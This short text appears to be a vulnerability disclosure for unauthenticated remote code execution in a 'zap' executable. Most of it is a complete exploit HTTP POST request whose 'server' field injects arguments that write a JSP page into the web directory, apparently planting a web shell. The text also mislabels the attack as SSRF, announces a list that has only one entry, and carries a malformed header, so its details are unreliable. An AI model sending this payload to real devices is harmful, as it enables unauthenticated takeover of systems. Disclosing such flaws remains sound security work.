Remote code execution vulnerability in zap caused by insufficient input validation.
zap
executable is reachable without authentication. Due to insufficient input validation, unintended arguments can be used to write a page which is vulnerable to one of the following command injection vulnerabilities:
SSRF POST request example
POST /tools/_rcmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 310
<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='192.168.0.1' tool='zap-up' zap-type='udp' server='{tx_station} -R -L/web/uploaded/index.jsp -T<%Delegate("AjaxCmdStat" -Ssession["cid"]);%>' syspmtu=65500 />
</ajax-request>